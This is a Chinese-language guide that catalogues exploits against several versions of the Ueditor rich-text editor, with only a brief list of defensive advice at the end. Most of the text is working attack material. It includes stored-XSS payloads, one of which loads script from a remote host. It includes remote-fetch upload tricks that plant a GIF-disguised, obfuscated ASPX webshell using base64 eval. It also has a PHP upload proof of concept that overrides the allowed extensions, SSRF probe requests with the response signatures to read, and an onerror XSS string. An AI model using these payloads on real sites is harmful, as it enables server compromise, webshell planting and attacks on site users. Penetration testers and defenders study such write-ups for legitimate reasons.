Ueditor编辑器漏洞总结
字数 888 2025-08-09 23:12:49
Ueditor编辑器漏洞总结与利用指南
0x01 概述
Ueditor是一款常用的富文本编辑器,存在多个版本的安全漏洞,包括XSS、文件上传和SSRF等。本文档详细总结各版本漏洞利用方法。
0x02 XML文件上传导致存储型XSS
影响版本:php版 v1.4.3.3
复现步骤
- 上传图片文件
- 使用BurpSuite拦截请求
- 修改参数:
- 将
uploadimage类型改为uploadfile - 修改文件后缀为
.xml - 插入XSS payload
- 将
常用XSS Payload
<!-- 弹窗XSS -->
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script></body></html>
<!-- URL跳转 -->
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">window.location.href="https://www.t00ls.net/";</something:script></body></html>
<!-- 远程加载JS -->
<html><head></head><body><something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml"></something:script></body></html>
常见上传路径
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage
0x03 文件上传漏洞
.NET版本文件上传漏洞
影响版本:1.4.3.3、1.5.0和1.3.6
1.5.0版本利用
POST /ueditor/net/controller.ashx?action=catchimage
source[]=http://x.x.x.x/1.gif?.aspx
1.4.3.3版本利用
- 构造HTML表单:
<form action="http://target/ueditor/net/controller.ashx?action=catchimage" method="POST">
<input type="text" name="source[]" value="http://x.x.x.x/1.gif?.aspx"/>
<input type="submit"/>
</form>
- 准备图片木马(1.gif):
GIF89a<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>
1.3.6版本利用
使用%00截断方式上传绕过
PHP版本文件上传漏洞
利用POC:
POST /ueditor/php/action_upload.php?action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/fuck&CONFIG[imageMaxSize]=9999999&CONFIG[imageAllowFiles][]=.php&CONFIG[imageFieldName]=fuck HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryDMmqvK6b3ncX4xxA
--WebKitFormBoundaryDMmqvK6b3ncX4xxA
Content-Disposition: form-data; name="fuck"; filename="fuck.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--WebKitFormBoundaryDMmqvK6b3ncX4xxA--
0x04 SSRF漏洞
影响版本:1.4.3的jsp版本
探测方法
/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:8080
判断依据
- 远程连接出错:
{"state": "SUCCESS", list:[{"state":"\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519"}]} - 成功抓取图片:
{"state": "SUCCESS", list: [{"state":"SUCCESS","size":"5103","source":"http://192.168.135.133:8080/tomcat.png"}]} - 主机无法访问:
{"state":"SUCCESS", list: [{"state":"\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25"}]}
Onethink 1.0中的SSRF
POST /Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
upfile=https://www.google.com/?%23.jpg
0x05 另一处XSS漏洞
利用方法
- 在编辑器中输入正常文本
- 拦截请求并修改内容:
%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E
0x06 防护建议
- 升级到最新版本
- 严格校验上传文件类型和内容
- 限制远程图片抓取功能
- 对用户输入进行严格过滤
- 设置合理的文件上传目录权限
附录:常见路径总结
上传路径
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage
/ueditor/net/controller.ashx?action=uploadfile
/ueditor/net/controller.ashx?action=uploadimage
/ueditor/asp/controller.asp?action=uploadfile
/ueditor/asp/controller.asp?action=uploadimage
文件列表路径
/ueditor/net/controller.ashx?action=listfile
/ueditor/net/controller.ashx?action=listimage